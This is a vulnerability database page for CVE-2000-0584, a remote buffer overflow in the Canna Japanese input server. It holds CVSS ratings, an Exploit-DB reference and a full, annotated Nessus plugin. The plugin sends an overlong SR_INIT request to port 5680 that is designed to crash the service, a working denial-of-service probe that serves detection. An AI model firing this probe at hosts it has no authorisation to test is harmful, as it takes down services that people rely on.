Vulnerabilities > CVE-2000-0584

047910
CVSS 10.0 - CRITICAL
Attack vector: NETWORK
Attack complexity: LOW
Privileges required: NONE
Confidentiality impact: COMPLETE
Integrity impact: COMPLETE
Availability impact: COMPLETE
network
low complexity
debian
freebsd
critical
nessus
exploit available

Summary

Buffer overflow in Canna input system allows remote attackers to execute arbitrary commands via an SR_INIT command with a long user name or group name.

Vulnerable Configurations

| Part | Description | Count |
|------|-------------|-------|
| OS   | Debian      | 1     |
| OS   | Freebsd     | 1     |

Exploit-Db

description: Canna Canna 3.5 b2 Remote Buffer Overflow Vulnerability. CVE-2000-0584. Remote exploit for linux platform
id: EDB-ID:20061
last seen: 2016-02-02
modified: 2000-07-02
published: 2000-07-02
reporter: UNYUN
source: https://www.exploit-db.com/download/20061/
title: Canna Canna 3.5 b2 - Remote Buffer Overflow Vulnerability

Nessus

NASL family: Gain a shell remotely
NASL id: CANNA_OVERFLOW.NASL
description: The remote host is running Canna, a service that processes Japanese input and translates it from kana to kanji. It was possible to make the remote Canna server crash by sending a SR_INIT command with a very long string. A remote attacker could use this to crash the service, or possibly execute arbitrary code.
last seen: 2020-06-01
modified: 2020-06-02
plugin id: 11114
published: 2002-08-29
reporter: This script is Copyright (C) 2002-2018 Tenable Network Security, Inc.
source: https://www.tenable.com/plugins/nessus/11114
title: Canna SR_INIT Command Remote Overflow
code
#
# (C) Tenable Network Security, Inc.
#


include("compat.inc");


# Registration block: when the scanner loads the plugin with `description`
# set, only the metadata below is recorded and the script exits (exit(0) at
# the end of the block) without contacting any target.
if(description)
{
 # Identifiers that tie this check to the advisory: plugin id, Bugtraq id and CVE.
 script_id(11114);
 script_bugtraq_id(1445);
 script_version ("1.14");
 script_cve_id("CVE-2000-0584");
 script_name(english:"Canna SR_INIT Command Remote Overflow");
 script_summary(english:"Checks if the remote Canna can be buffer overflown");

 # Report text shown to the analyst. The description states that detection is
 # based on the Canna server crashing, not on a version comparison.
 script_set_attribute(attribute:"synopsis", value:
"The remote language translation service has a buffer overflow
vulnerability." );
 script_set_attribute(attribute:"description", value:
"The remote host is running Canna, a service that processes Japanese
input and translates it from kana to kanji.

It was possible to make the remote Canna server crash by sending a
SR_INIT command with a very long string.  A remote attacker could use
this to crash the service, or possibly execute arbitrary code." );
 # https://web.archive.org/web/20000819124158/http://archives.neohapsis.com/archives/vendor/2000-q2/0062.html
 script_set_attribute(
   attribute:"see_also",
   value:"http://www.nessus.org/u?5a347380"
 );
 # The remediation text is generic: it names no fixed release, so the patched
 # version has to be taken from the vendor or distribution advisory.
 script_set_attribute(
   attribute:"solution", 
   value:"Upgrade to the latest version of the software."
 );
 # CVSS v2 base vector: network reachable, low complexity, no authentication,
 # Partial impact on confidentiality, integrity and availability.
 # NOTE(review): other listings of this CVE rate the three impacts as
 # Complete; confirm which score your reporting should carry.
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
 # Temporal vector: proof-of-concept exploit code, official fix available,
 # report confirmed.
 script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
 script_set_attribute(attribute:"exploit_available", value:"true");
 script_set_attribute(attribute:"plugin_publication_date", value: "2002/08/29");
 script_set_attribute(attribute:"vuln_publication_date", value: "2000/07/05");
 script_cvs_date("Date: 2018/06/27 18:42:25");
 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_end_attributes();
		    
 # Categorised as a destructive check: a positive result means the probe
 # crashed the target's Canna service.
 # NOTE(review): scan policies with safe checks enabled normally skip this
 # category; confirm the policy before scheduling against production hosts.
 script_category(ACT_DESTRUCTIVE_ATTACK);
 script_family(english:"Gain a shell remotely");
 
 script_copyright(english:"This script is Copyright (C) 2002-2018 Tenable Network Security, Inc.");
		  
 # Port 5680/tcp is declared as the plugin's required port; the check body
 # uses the same hard-coded port, so a Canna server listening on another
 # port is not tested.
 script_require_ports(5680);
 exit(0);
}

include("global_settings.inc");
include("misc_func.inc");

# Active check for CVE-2000-0584 against the Canna server on 5680/tcp.
# The result is crash-based: the host is reported only if the service stops
# answering after the probe, so a positive finding means the production
# service was taken down and needs a restart.
port = 5680;
if (!get_port_state(port))
  exit(0, "TCP port "+port+" is closed.");

sock = open_sock_tcp(port);
if (!sock)
  exit(1, "Cannot open TCP connection to port "+port+".");

# Eight-byte request header followed by a "3.3:" prefix, 300 filler bytes and
# a NUL terminator. The header's last byte (50) is smaller than the string
# that follows it.
# NOTE(review): presumably the header holds the SR_INIT opcode and a declared
# length, and "3.3:" is the protocol version preceding the user name; confirm
# against the Canna protocol before reusing these values in an IDS signature.
header  = raw_string(0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 50);
payload = "3.3:" + crap(300) + raw_string(0);
send(socket:sock, data:header + payload);

# The four-byte reply is read but never inspected.
reply = recv(socket:sock, length:4);
close(sock);

# service_is_dead() comes from misc_func.inc; a positive return is treated as
# "the listener no longer responds".
# NOTE(review): a server that survives the probe, or one restarted by a
# supervisor before this test runs, would not be reported. Treat a clean
# result as inconclusive and verify the installed version as well.
if (service_is_dead(port: port, exit: 1) > 0)
  security_hole(port);